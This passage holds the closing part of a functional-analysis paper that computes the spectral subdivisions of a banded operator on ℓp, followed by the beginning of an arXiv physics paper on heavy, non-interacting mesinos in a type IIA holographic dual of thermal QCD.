is given by \[\sigma_{p}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] _Remark 4.7_.: The adjoint operator \(T^{*}:\ell_{p}^{*}\to\ell_{p}^{*}\) is represented by the transpose of the matrix \(T\), and the dual of \(\ell_{p}\) is isomorphic to \(\ell_{q}\) where \(\frac{1}{p}+\frac{1}{q}=1\) and \(1<q<\infty\). Similarly to \(T\), the operator \(T^{*}\) can also be written as \[T^{*}=T_{0}+K^{t},\] where \(K^{t}\) denotes the transpose of \(K\) and \(K^{t}\) is also a compact operator. 
Since \(\sigma(T,\ell_{p})=\sigma(T^{*},\ell_{p}^{*})\), Theorem 4.2 implies \[\sigma(T_{0},\ell_{p})\subseteq\sigma(T^{*},\ell_{p}^{*}),\] and, using a similar argument to the proof of Theorem 4.2, it can be obtained that \(\sigma(T^{*},\ell_{p}^{*})\setminus\sigma(T_{0},\ell_{p})\) contains a finite or countable number of eigenvalues of \(T^{*}\) of finite type with no accumulation point in \(\sigma(T^{*},\ell_{p}^{*})\setminus\sigma(T_{0},\ell_{p})\). Assuming a hypothesis on the rate of convergence of the sequences similar to that in Theorem 4.4, we can prove that \[\sigma_{ess}(T^{*},\ell_{p}^{*})\cap\sigma_{p}(T^{*},\ell_{p}^{*})=\emptyset\] and this implies that the point spectrum of \(T^{*}\) lies outside the region \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] Now, as in Theorem 4.6, let \(\{g_{n}^{(1)}(\lambda),g_{n}^{(2)}(\lambda)\}\) and \(\{h_{n}^{(1)}(\lambda),h_{n}^{(2)}(\lambda)\}\) be the sets of fundamental solutions of the following difference equations respectively \[b_{2n-1}g_{n}+(a_{2n+1}-\lambda)g_{n+1}+c_{2n+1}g_{n+2}=0,\] \[b_{2n}h_{n}+(a_{2n+2}-\lambda)h_{n+1}+c_{2n+2}h_{n+2}=0,\] which are obtained from \(T^{*}f=\lambda f\), \(f\in\ell_{p}^{*}\) and \(g_{n}(\lambda)=f_{2n-1}(\lambda)\), \(h_{n}(\lambda)=f_{2n}(\lambda)\). Also, \(g_{0}(\lambda)=h_{0}(\lambda)=0\). This leads us to the following result \[\sigma_{p}(T^{*},\ell_{p}^{*})=\left\{\lambda\in\mathbb{C}:g_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:h_{0}^{(1)}(\lambda)=0\right\}.\] Consequently, we obtain that \[\sigma(T^{*},\ell_{p}^{*})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{2},\] where \[S_{2}=\left\{\lambda\in\mathbb{C}:g_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:h_{0}^{(1)}(\lambda)=0\right\}.\] Since \(\sigma(T,\ell_{p})=\sigma(T^{*},\ell_{p}^{*})\), and both the sets \(S_{1}=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}\) (the point spectrum of \(T\) obtained in Theorem 4.6) and \(S_{2}\) are disjoint from \([r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\), we have \(S_{1}=S_{2}\). Using the observations in Remark 4.7 and Proposition 2.1, we can summarize all the results on the spectrum and the various spectral subdivisions of the operator \(T\) in the following theorem. **Theorem 4.8**.: If the convergence of the sequences \(\{a_{2n-1}\},\;\{a_{2n}\},\;\{b_{2n-1}\},\;\{b_{2n}\},\;\{c_{2n-1}\}\) and \(\{c_{2n}\}\) is exponentially fast, then the following hold: 1. The spectrum of \(T\) on \(\ell_{p}\) is \[\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] 2. The point spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{p}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] 3. The residual spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{r}(T,\ell_{p})=\emptyset.\] 4. The continuous spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{c}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] 5. The essential spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{ess}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] 6. The discrete spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{d}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] 7. The compression spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{co}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] 8. 
The approximate point spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{app}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] 9. The defect spectrum of \(T\) on \(\ell_{p}\) is \[\sigma_{\delta}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] Proof.: The proofs of the above statements are given below. 1. It is well known that \(\sigma_{p}(T,\ell_{p})\subseteq\sigma(T,\ell_{p})\) and \(\sigma(T_{0},\ell_{p})\subseteq\sigma(T,\ell_{p})\). This implies \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}\subseteq\sigma(T,\ell_{p}).\] Also, by using Theorem 4.2, we get \[\sigma(T,\ell_{p})\subseteq[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] Hence, \[\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] 2. The result has been proved in Theorem 4.6. 3. We are already aware that \(\sigma_{r}(T,\ell_{p})=\sigma_{p}(T^{*},\ell_{p}^{*})\setminus\sigma_{p}(T,\ell_{p})\). Hence, \[\sigma_{r}(T,\ell_{p})=\emptyset.\] 4. The spectrum of an operator is the disjoint union of the point spectrum, the residual spectrum and the continuous spectrum. By using this result we obtain the desired conclusion. 5. The required result has been proved in Corollary 4.3. 6. We already proved that the point spectrum of \(T\) is disjoint from \([r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\), and by Theorem 4.2 every element of \(\sigma_{p}(T,\ell_{p})\) is of finite type. Hence, \[\sigma_{d}(T,\ell_{p})=\left\{\lambda\in\mathbb{C}:y_{0}^{(1)}(\lambda)=0\right\}\cup\left\{\lambda\in\mathbb{C}:z_{0}^{(1)}(\lambda)=0\right\}.\] 7. By part 5 of Proposition 2.1, the desired result is obvious. 8. Clearly, \[\sigma_{app}(T,\ell_{p})\subseteq\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] Also, we know that the point spectrum is always a subset of the approximate point spectrum. By using this fact and with the help of part 7 of Proposition 2.1, we have \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}\subseteq\sigma_{app}(T,\ell_{p}).\] Hence, \[\sigma_{app}(T,\ell_{p})=\sigma(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] 9. By part 3 of Proposition 2.1, we have \[\sigma_{app}(T^{*},\ell_{p}^{*})=\sigma_{\delta}(T,\ell_{p}).\] Clearly, \[\sigma_{app}(T^{*},\ell_{p}^{*})\subseteq\sigma(T^{*},\ell_{p}^{*})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] Since \(\sigma_{p}(T^{*},\ell_{p}^{*})\subseteq\sigma_{app}(T^{*},\ell_{p}^{*})\), we have \(S_{1}\subseteq\sigma_{app}(T^{*},\ell_{p}^{*})\). By using this fact and with the help of part 7 of Proposition 2.1, we have \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}\subseteq\sigma_{app}(T^{*},\ell_{p}^{*}).\] Therefore, \(\sigma_{app}(T^{*},\ell_{p}^{*})=\sigma(T,\ell_{p})\). Hence, \[\sigma_{\delta}(T,\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}]\cup S_{1}.\] ### Disclosure statement No potential conflict of interest was reported by the authors.
2308.05033
QCD-Compatible Supermassive Inert Top-Down Holographic Mesinos at Intermediate Coupling
A longstanding problem with the popular Sakai-Sugimoto holographic dual of thermal QCD is that the "mesinos", the (non-supersymmetric) fermionic partners of the mesons, are nearly isospectral with mesons and have an unsuppressed mesino-meson interaction, both being in contradiction with actual QCD. We solve this problem in a UV-complete (and ${\it different}$) type IIA string dual ${\it at\ intermediate\ coupling}$ of realistic thermal QCD, in which the mesinos are shown to be much heavier than and non-interacting with mesons (the wave-function/mass/interaction terms receiving no ${\cal M}$-theory ${\cal O}(R^4)$ corrections). In particular we derive a large-$N$ enhancement of the KK mass scale $M_{KK}$ (from $M_{KK}$ to $M_{KK}^{\rm eff}\sim N^{1 + \frac{1}{{\cal O}(1)}}M_{KK}$) arising from the construction of the type IIA mirror \cite{MQGP} of the type IIB dual \cite{metrics} of thermal QCD-like theories, as well as the generation of a one-parameter family of $M_{KK}$-independent mass scale at ${\cal O}(R^4)$ in the ${\cal M}$-theory uplift \cite{OR4} wherein the parameter can be made appropriately large. We also show that the mesino-mesino-single-($\rho/\pi$)meson interactions, vanish identically in the aforementioned type IIA holographic dual.
Aalok Misra, Gopal Yadav
2023-08-09T16:02:59Z
http://arxiv.org/abs/2308.05033v3
# QCD-Compatible Supermassive Inert Top-Down Holographic Mesinos at Intermediate Coupling ###### Abstract A longstanding problem with the popular Sakai-Sugimoto holographic dual of thermal QCD is that the "mesinos", the (non-supersymmetric) fermionic partners of the mesons, are nearly isospectral with mesons and have an unsuppressed mesino-mesino-meson interaction, both being in contradiction with actual QCD. We solve this problem in a UV complete (and _different_) type IIA string dual _at intermediate coupling_ of realistic thermal QCD, in which the mesinos are shown to be much heavier than and non-interacting with mesons (the wave-function/mass/interaction terms receiving no \({\cal M}\)-theory \({\cal O}(R^{4})\) corrections). In particular we derive a large-\(N\) enhancement of the KK mass scale \(M_{KK}\) (from \(M_{KK}\) to \(M_{KK}^{\rm eff}\sim N^{1+\frac{1}{{\cal O}(1)}}M_{KK}\)) arising from the construction of the type IIA mirror [1] of the type IIB dual [2] of thermal QCD-like theories, as well as the generation of a one-parameter family of \(M_{KK}\)-independent mass scale at \({\cal O}(R^{4})\) in the \({\cal M}\)-theory uplift [3] wherein the parameter can be made appropriately large. We also show that the mesino-mesino-single-\((\rho/\pi)\)-meson interactions vanish identically in the aforementioned type IIA holographic dual. ###### Contents * 1 Introduction * 2 Type IIA String Dual of Thermal QCD-Like Theories Inclusive of \({\cal O}(R^{4})\) Corrections * 3 Supermassive Mesinos in Type IIA String Theory * 4 Generation of \(N\)-hanced Mass Scale for \(T<T_{c}\) * 5 Non-Interacting Mesinos * 6 Top-Down \(m_{\rm quark}\langle\bar{q}q\rangle\) Non-Renormalization up to \({\cal O}(R^{4})\) * 7 Universality in Particle Wave Functions in the IR * 8 Summary * A Finite Baryon Chemical Potential * B EOM-Related for Massive Mesinos * C \(\tilde{z}=\)Constant Embedding of Flavor \(D6\)-Branes Inclusive of \({\cal O}(\beta)\) Corrections * D Constants appearing in the Solution to the Mesino Wave-Function for \(T>T_{c}\) * E Summary of Applications of Top-Down Holographic QCD [1], [3] ## 1 Introduction One can construct gauge theories from a stack of \(D\)-branes and various configurations of the same. In this context, in the spirit of (non-conformal, non-supersymmetric) gauge-gravity duality (inspired by [4]), mostly bosonic fluctuations on the world volume of \(D\)-branes have been considered. The type IIA dual inclusive of the \({\cal O}(R^{4})\) corrections - to explore the finite-\(N\)-limit/intermediate coupling regime of QCD - of the type IIB dual [2] of thermal QCD-like theories was worked out in [1] and [3]. As a recent example, inclusive of higher derivative corrections to address the finite-\(N\)/intermediate coupling regime (as worked out in [3]), phenomenologically-compatible low energy coupling constants up to NLO in the chiral expansion in \(SU(3)\) chiral perturbation theory (in the chiral limit) were obtained from the DBI action on flavor \(D6\)-branes in [5]. A Dirac-like action for the supersymmetric partners of mesons, the mesinos, has been obtained from a top-down approach on \(Dp\)-branes [6]; see [7] for the bottom-up approach. However, using the same for the Sakai-Sugimoto type IIA dual [8] of thermal QCD, it was shown that one runs into a problem - the mesinos and mesons turn out to be approximately isospectral and their interaction is not large-\(N\) suppressed [9] - both _in contradiction with real QCD_. 
This serves as the main motivation for this paper - to see if this issue can be resolved in the type IIA mirror [1] at intermediate coupling [3] of the non-supersymmetric _UV-complete_ type IIB dual [2] of thermal QCD-like theories. In this paper, we explicitly consider the mesino action on flavor \(D6\)-branes in the aforementioned type IIA dual. _In this paper we also study the effect of higher derivative terms on the fermions relevant to holographic thermal QCD, which was missing in [6]. In short, we will show that the mesinos are supermassive and do not interact with the vector/\(\pi\) mesons, which is why we refer to them as W(eakly) I(nteracting) S(upermassive) P(articles), thereby not being in conflict with realistic QCD._ The following serves as a brief summary of the main results of this paper. * _Supermassive mesinos_ (Sec. 3): * _Dirichlet/Neumann boundary condition for the radial profile of the mesino wave function_: The on-shell DBI Lagrangian density \(\mathcal{L}^{\text{DBI, D6}}_{\text{on-shell}}\) of the type IIA flavor \(D6\)-branes (corresponding to \(i:\Sigma_{(7)}\cong S^{1}_{t}\times_{w}\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 }\times_{w}S^{2}_{\text{squashed}}(a)\hookrightarrow M_{10}\) [the embedding of the flavor \(D6\)-branes in the ten-dimensional background involving a warped squashed resolved conifold] in the \(\psi=2n\pi,n=0,1,2\)-coordinate patches and for vanishingly small Ouyang embedding parameter in the parent type IIB dual) obtained from the SYZ mirror of the type IIB holographic dual of [2], in the intermediate-\(N\) MQGP limit (3), can be shown to be vanishingly small. The mesino EOM, \[\mathcal{A}\Theta+\Bigg{[}\frac{\Lambda_{2}\left(\left\{\Gamma^{\alpha}\right\},\mathcal{F}^{\text{IIA}},\mathcal{A}\right)}{\mathcal{L}^{\text{DBI, D6}}_{\text{on-shell}}}+\frac{\Lambda_{3}\left(\left\{\Gamma^{\alpha}\right\},\mathcal{F}^{\text{IIA}}\right)}{\left(\mathcal{L}^{\text{DBI, D6}}_{\text{on-shell}}\right)^{2}}\Bigg{]}\Gamma^{\gamma}D_{\gamma}\Theta=0,\] (where \(\gamma\in\left\{t,x^{1,2,3},r,\theta_{2},\tilde{y}\right\}\) indexes the coordinates of the flavor \(D6\)-branes' world volume \(\Sigma_{(7)}\), and \(\mathcal{A},\mathcal{F}^{\text{IIA}}\) are defined in (21), (16) respectively; \(\Lambda_{2,3}\) can be read off from (20)) can hence be approximated by a massless Dirac equation on \(\Sigma_{(7)}\). * Either by looking at the \(SU(3)\) and the "transverse" \(SU(3)\) structures on \(M_{6}(=S^{1}_{t}\times_{w}\mathcal{T},\ \times_{w}\) implying a warped product, \(S^{1}_{t}\) being the thermal circle and \(\mathcal{T}\) - deformed \(T^{1,1}\) - being the base of a warped non-Kahler squashed resolved conifold)/\(\tilde{M}_{6}(=\)non-Kahler warped squashed resolved conifold), or when considering the embedding of the \(D6\)-brane world volume \(\Sigma_{(7)}\cong S^{1}_{t}\times_{w}(\mathbb{R}^{3}\times\mathbb{R}_{\geq 0 })\times_{w}S^{2}_{\text{squashed}}\) in \(M_{10}\) considered either as \((S^{1}_{t}\times_{w}\mathbb{R}^{3})\times_{w}\tilde{M}_{6}\) or \(\mathbb{R}^{3}\times_{w}(\mathbb{R}_{\geq 0}\times M_{6})\), one is therefore guaranteed the existence of a pair of globally defined spinors. Using the same, and imposing anti-periodic boundary conditions along \(S_{t}^{1}\), the ansatz (26) was made for the mesino spinor, and the radial profile functions therein were solved for. 
* For the thermal background (5) dual to thermal QCD for \(T<T_{c}\), as well as the black-hole background (4) dual to thermal QCD for \(T>T_{c}\), we found that Dirichlet/Neumann boundary condition at \(r=r_{0}\) (IR cut-off in the thermal background)/\(r=r_{h}\) permitted supermassive mesinos. * _Enhancement of mass scale_: * Starting from the \(D=11\) supergravity Einstein's field equations in the presence of four-form \(G\) fluxes of \(\mathcal{M}\)-theory, we explicitly show the generation of an \(N\)-enhanced (\(\equiv\) "\(N\)-hanced") mass scale, thereby providing the mechanism of generation of supermassive mesinos. * Replacing the resolution parameter "\(a\)" of the blown-up \(S^{2}\) by \(a(r)\), substituting an ansatz: \(a(r)=b+c^{\beta^{0}}(r-r_{0})+\beta\mathcal{A}^{\beta}(r)\) into the Einstein equations and estimating \(r_{0}\sim e^{-\kappa_{r_{0}}N^{1/3}}\)[23], near the \(\psi=2n\pi,n=0,1,2\)-coordinate patches, we therefore see that: \[b\sim N^{1+\frac{1}{\mathcal{O}(1)}}r_{0};\quad\mathcal{A}^{\beta}(r)= \mathcal{C}e^{\frac{c_{\text{linear}}}{b}r},\ \mathcal{C}\equiv\text{constant}.\] (1) * _Vanishing mesino-mesino-meson interaction_ (Sec. 5): Considering fluctuations of the vector mesons \(A_{\mu\in S_{t}^{1},\mathbb{R}^{3},r}\to A_{\mu,r}^{(0)}+\delta A_{\mu,r}\) (with \(A_{\mu=t}^{(0)}\) being the only non-zero background value) in the fermionic flavor \(D6\)-brane action and retaining terms linear in the same, performing a KK expansion of the field strength fluctuation along with decomposition of the positive-chirality Majorana-Weyl mesino spinor along \(M_{5}(t,x^{1,2,3},r)\) and \(\tilde{M}_{5}(\theta_{1,2},\phi_{1,2},\psi)\), we were able to show that no mesino-mesino-\(\rho/\pi\)-meson vertex is generated. * _Non-renormalization of the mesino wave function and mass_ (Sec. 3, and appendices B and D): Studying the effect of \(\mathcal{O}(R^{4})\) terms on the fermions relevant to holographic thermal QCD, which was missing in [6], leads us to a _non-renormalization of the mesino wave function and mass_, in the sense that both turn out to be independent of the \(\mathcal{O}(R^{4})\) terms up to \(\mathcal{O}(l_{p}^{6}/N^{\alpha}),\ \alpha\geq 1\)1, \(l_{p}\) being the Planckian length. Footnote 1: In [3], terms up to \(\mathcal{O}\left(\frac{\beta^{0}}{N}\right)\) and \(\mathcal{O}\left(\frac{\beta}{N^{\alpha}}\right),\ 0<\alpha<1,\ \beta\sim l_{p}^{6}\), were considered. * _Universality in particle wave functions in the IR_ (Sec. 7): universality in the context of glueball, meson, and graviton wave-functions. The summary of the paper has been provided in section 8. There are five appendices. Appendix A contains the discussion of the baryon chemical potential. Appendix B consists of quantities appearing in the mesino EOMs of section 3. In Appendix C, we compute the embedding of flavor \(D6\)-branes in type IIA string theory inclusive of \(\mathcal{O}(R^{4})\) corrections. We list the constants appearing in the wave function for the black hole background in appendix D. 
Finally, we summarize the top-down holographic QCD results obtained by our group in appendix E. ## 2 Type IIA String Dual of Thermal QCD-Like Theories Inclusive of \({\cal O}(R^{4})\) Corrections Thermal QCD-like theories refer to the equivalence class of theories that are IR confining and UV conformal, with the "quarks" transforming in the fundamental representation of the symmetry groups (color and flavor). The UV-complete type IIB string dual of such large-\(N\) thermal QCD-like theories was constructed in [2]. The brane picture consists of \(N\) space-time filling \(D3\)-branes at the tip of a warped resolved conifold; \(M\) space-time filling \(D5\)-branes, also at the tip of the aforementioned conifold, wrapping the vanishing squashed \(S^{2}\) and located at the North Pole of the resolved squashed \(S^{2}\) of radius \(a\) (the resolution parameter); and \(M\) space-time filling \(\overline{D5}\)-branes, also at the tip of the conifold, wrapping the abovementioned vanishing squashed \(S^{2}(\theta_{1},\phi_{1})\) and located at the South Pole of the resolved squashed \(S^{2}(\theta_{2},\phi_{2})\). In addition, there are \(N_{f}\) space-time filling flavor \(D7\)-branes wrapping the vanishing squashed \(S^{3}(\theta_{1},\phi_{1},\psi)\) as well as being at the North Pole of the squashed resolved \(S^{2}(\theta_{2},\phi_{2})\), dipping into the IR up to \(|\mu_{\rm Ouyang}|^{\frac{2}{3}},\ |\mu_{\rm Ouyang}|\) being the modulus of the Ouyang embedding parameter in the Ouyang embedding of the flavor \(D7\)-branes: \[\left(9a^{2}r^{4}+r^{6}\right)^{1/4}e^{\frac{i}{2}(\psi-\phi_{1}-\phi_{2})} \sin\frac{\theta_{1}}{2}\sin\frac{\theta_{2}}{2}=\mu_{\rm Ouyang}. \tag{2}\] An equal number of \(\overline{D7}\)-branes, wrapping the vanishing squashed \(S^{3}(\theta_{1},\phi_{1},\psi)\) and located at the South Pole of the blown-up squashed \(S^{2}(\theta_{2},\phi_{2})\), are also present. An equal number of \(D5/D7\)-branes and \(\overline{D5}/\overline{D7}\)-branes in the UV ensures UV conformality. The presence of \(N_{f}\) flavor \(D7\)- and \(\overline{D7}\)-branes in the UV implies a flavor gauge group \(SU(N_{f})\times SU(N_{f})\) in the UV, which is broken to \(SU(N_{f})\) due to the absence of \(\overline{D7}\)-branes in the IR 2 (the analog of chiral symmetry breaking in this brane setup). The brane construct in the type IIB dual is summarized in Table 1. Footnote 2: On the gravity dual side we characterize the UV (\(r>{\cal R}_{D5/\overline{D5}}\)) and the IR (\(r<{\cal R}_{D5/\overline{D5}}\)) in terms of the radial coordinate, where \({\cal R}_{D5/\overline{D5}}\) is the boundary between the UV and the IR, and the separation between the \(D5\)- and \(\overline{D5}\)-branes. IR confinement in the gravity dual is effected by deforming the vanishing squashed \(S^{3}\) in the conifold. Since we are interested in finite temperature QCD, the same is effected via the black hole (\(T>T_{c}\)) and thermal (\(T<T_{c}\)) backgrounds on the gravity dual side. Due to finite temperature and the finite separation of \(D5\)- and \(\overline{D5}\)-branes on the brane side, the conifold further also needs to possess an \(S^{2}\) blow-up/resolution (with radius/resolution parameter \(a\)). Additionally, the ten-dimensional warp factor and fluxes include the effect of back-reaction. Therefore, we conclude that the string dual of thermal QCD-like theories in the large-\(N\) limit involves a warped resolved deformed conifold. 
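As a small numerical illustration of the statement that the flavor \(D7\)-branes dip into the IR only down to \(r\sim|\mu_{\rm Ouyang}|^{\frac{2}{3}}\), one can solve the modulus of the Ouyang embedding (2) for the minimal radial coordinate at fixed angles. The sketch below is an illustrative addition, not taken from the paper; the values of \(|\mu_{\rm Ouyang}|\), of the resolution parameter and of the angles are arbitrary sample choices, and the phases are fixed so that the left-hand side of (2) is real.

```python
import numpy as np
from scipy.optimize import brentq

# Arbitrary sample values (not from the paper).
mu_abs = 1e-3                 # |mu_Ouyang|, taken to be very small
a_res = 1e-2                  # resolution parameter a
theta1 = theta2 = np.pi / 2   # fixed angles; psi - phi1 - phi2 = 0, so the phase is trivial

def ouyang(r):
    # modulus of the left-hand side of (2) minus |mu_Ouyang|
    return ((9 * a_res**2 * r**4 + r**6) ** 0.25
            * np.sin(theta1 / 2) * np.sin(theta2 / 2) - mu_abs)

r_min = brentq(ouyang, 1e-9, 10.0)   # smallest r reached by the flavor D7-branes
print(r_min, mu_abs ** (2 / 3))
# For a -> 0 and sin(theta_i/2) = O(1), r_min is of the order |mu_Ouyang|^{2/3},
# matching the IR reach quoted in the text.
```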
The additional advantage of the type IIB dual of [2] is that in the IR, at the end of a Seiberg-like duality cascade, the number of colors \(N_{c}\) gets identified with \(M\), which in the intermediate-\(N\) MQGP limit [1], [10] \[g_{s}\sim\frac{1}{\mathcal{O}(1)},M,N_{f}\equiv\mathcal{O}(1),N>1,\frac{g_{s}M ^{2}}{N}\ll 1,\frac{\left(g_{s}M^{2}\right)\left(g_{s}N_{f}\right)}{N}\ll 1, \tag{3}\] can be tuned to equal 3; given that one is working in the vanishing-Ouyang-modulus limit (\(|\mu_{\text{Ouyang}}|\ll 1\) in (2)) of the embedding of the flavor \(D7\)-branes, \(N_{f}\) can be set to either 2 or 3 corresponding to the lightest quark flavors [5]. \begin{table} \begin{tabular}{|c|c|c|} \hline S. No. & Branes & World Volume \\ \hline 1. & \(N\)\(D3\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\{r=0\}\) \\ \hline 2. & \(M\)\(D5\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\{r=0\}\times S^{2}(\theta_{1},\phi_{1}) \times\text{NP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline 3. & \(M\)\(\overline{D5}\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\{r=0\}\times S^{2}(\theta_{1},\phi_{1}) \times\text{SP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline 4. & \(N_{f}\)\(D7\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\mathbb{R}_{+}(r\in[|\mu_{\text{Ouyang}}|^{ \frac{2}{3}},r_{\text{UV}}])\times S^{3}(\theta_{1},\phi_{1},\psi)\times\text {NP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline 5. & \(N_{f}\)\(\overline{D7}\) & \(\mathbb{R}^{1,3}(t,x^{1,2,3})\times\mathbb{R}_{+}(r\in[\mathcal{R}_{D5/ \overline{D5}}-\epsilon,r_{\text{UV}}])\times S^{3}(\theta_{1},\phi_{1},\psi) \times\text{SP}_{S^{2}_{a}(\theta_{2},\phi_{2})}\) \\ \hline \end{tabular} \end{table} Table 1: The Type IIB Brane Construct of [2] (NP and SP respectively denote the North Pole and South Pole of the blown-up \(S^{2}\)). Now, to explore the intermediate coupling regime, the \(\mathcal{O}(R^{4})\) terms in the eleven-dimensional supergravity action were considered in [3]. The \(\mathcal{M}\)-theory uplift was obtained in two steps: the type IIA Strominger-Yau-Zaslow (SYZ) mirror of the type IIB setup was first obtained, and then this mirror was uplifted to \(\mathcal{M}\)-theory. To obtain the type IIA SYZ mirror of the type IIB setup, a triple T-duality was performed along a 
The \(\mathcal{M}\)-theory uplift metric [1], [3] (finite-but-large-\(N\)/intermediate coupling) of [2] (UV-complete type IIB holographic dual of large-\(N\) thermal QCD-like theories) is expressed in the following form: \[ds_{11}^{2} = e^{-\frac{2\phi^{\rm IIA}}{3}}\Bigg{[}\frac{1}{\sqrt{h(r,\theta_ {1,2})}}\left(-g(r)dt^{2}+\left(dx^{1}\right)^{2}+\left(dx^{2}\right)^{2}+ \left(dx^{3}\right)^{2}\right) \tag{4}\] \[+\sqrt{h(r,\theta_{1,2})}\left(\frac{dr^{2}}{g(r)}+ds_{\rm IIA}^{ 2}(r,\theta_{1,2},\phi_{1,2},\psi)\right)\Bigg{]}+e^{\frac{4\phi^{\rm IIA}}{3 }}\left(dx^{11}+A_{\rm IIA}^{F_{11}^{\rm IIB}+F_{3}^{\rm IIB}+F_{5}^{\rm IIB}} \right)^{2},\] where the type IIA RR 1-forms, \(A_{\rm IIA}^{F_{i=1,3,5}^{\rm IIB}}\) are obtained from type IIB \(F_{1,3,5}^{\rm IIB}\) fluxes via the SYZ mirror of type IIB string dual [2], \(g(r)=1-\frac{r_{a}^{4}}{r^{4}}\), and \(\phi^{\rm IIA}\) is the type IIA dilaton profile. For low temperatures, i.e., \(T<T_{c}\), the thermal gravitational dual is given by: \[ds_{11}^{2} = e^{-\frac{2\phi^{\rm IIA}}{3}}\Bigg{[}\frac{1}{\sqrt{h(r,\theta_ {1,2})}}\left(-dt^{2}+\left(dx^{1}\right)^{2}+\left(dx^{2}\right)^{2}+\tilde{ g}(r)\left(dx^{3}\right)^{2}\right) \tag{5}\] \[+\sqrt{h(r,\theta_{1,2})}\left(\frac{dr^{2}}{\tilde{g}(r)}+ds_{ \rm IIA}^{2}(r,\theta_{1,2},\phi_{1,2},\psi)\right)\Bigg{]}+e^{\frac{4\phi^{ \rm IIA}}{3}}\left(dx^{11}+A_{\rm IIA}^{F_{11}^{\rm IIB}+F_{3}^{\rm IIB}+F_{5} ^{\rm IIB}}\right)^{2},\] where \(\tilde{g}(r)=1-\frac{r_{0}^{4}}{r^{4}}\). One notes that \(t\to x^{3},\ x^{3}\to t\) in (4) followed by a Double Wick rotation in the new \(x^{3},t\) coordinates obtains (5); \(h(r,\theta_{1,2})\) is the ten-dimensional warp factor [1, 2]. This is equivalent to: \(-g_{tt}^{\rm BH}(r_{h}\to r_{0})=g_{x^{3}x^{3}}\ {\rm Thermal}(r_{0})\), \(g_{x^{3}x^{3}}^{\rm BH}(r_{h}\to r_{0})=-g_{tt}\ {\rm Thermal}(r_{0})\) in the results of [13], [3] (see [14] in the context of Euclidean/black \(D4\)-branes in type IIA). In (5), we will assume the spatial part of the solitonic \(M3\) brane (which, locally, could be interpreted as solitonic \(M5\)-brane wrapped around a homologous sum of \(S_{\rm squashed}^{2}\)[15]) and their world volume given by \(\mathbb{R}^{2}(x^{1,2})\times S^{1}(x^{3})\) with the period of \(S^{1}(x^{3})\) given by a very large: \(\frac{2\pi}{M_{\rm 